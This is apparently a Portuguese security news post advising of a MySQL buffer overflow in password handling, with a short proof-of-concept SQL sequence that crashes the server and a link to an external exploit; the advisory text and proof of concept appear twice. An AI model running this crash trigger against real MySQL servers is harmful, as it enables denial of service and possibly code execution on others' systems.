Total Security - www.totalsecurity.com.br
MySQL Password Handler Buffer Overflow Vulnerability
Foi anunciada uma vulnerabilidade de buffer overflow no servidor MySQL que ocorre quando é inserido uma string de tamanho excessivo para a senha de um usuário.A versão apresenta-se devido a uma falta de verificação no limite apresentado quando se processa a senha do usuário no MySQL. Uma senha maior que 16 caracteres pode passar dos limites do buffer reservado na memória e corromper memórias adjacentes.
Um atacante com privilégio administrativo em um servidor MySQL afetado pode potencialmente explorar essa condição para suprir instruções arbitrárias executadas no contexto do servidor MySQL.
Exploit
A prova de que a vulnerabilidade existe está citada abaixo:
> USE mysql;
> ALTER TABLE User CHANGE COLUMN Password Password LONGTEXT;
> UPDATE User SET Password =
"123456781234567812345678123456781234567812345678123456781234567812345678
123456781234567812345678123456781234567812345678123456781234567812345678
123456781234567812345678123456781234567812345678123456781234567812345678
12345678123456781234567812345678..." WHERE User = "abcd";
> FLUSH PRIVILEGES;
[Connection lost]
mysqld_safe/safe_mysqld log :
O exploit para está vulnerabilidade pode ser encontrado no site:
http://www.securiteam.com/exploits/5RP0B1FB5M.html
Fonte: Guerra Digital
Nota Total Security: Todas as versões do MySQL parecem ter esse problema. A única versão imune por enquanto é a 4.0.15
Um atacante com privilégio administrativo em um servidor MySQL afetado pode potencialmente explorar essa condição para suprir instruções arbitrárias executadas no contexto do servidor MySQL.
Exploit
A prova de que a vulnerabilidade existe está citada abaixo:
> USE mysql;
> ALTER TABLE User CHANGE COLUMN Password Password LONGTEXT;
> UPDATE User SET Password =
"123456781234567812345678123456781234567812345678123456781234567812345678
123456781234567812345678123456781234567812345678123456781234567812345678
123456781234567812345678123456781234567812345678123456781234567812345678
12345678123456781234567812345678..." WHERE User = "abcd";
> FLUSH PRIVILEGES;
[Connection lost]
mysqld_safe/safe_mysqld log :
O exploit para está vulnerabilidade pode ser encontrado no site:
http://www.securiteam.com/exploits/5RP0B1FB5M.html
Fonte: Guerra Digital
Nota Total Security: Todas as versões do MySQL parecem ter esse problema. A única versão imune por enquanto é a 4.0.15
URL Fonte: http://www.totalsecurity.com.br/noticia/162/visualizar/
Comentários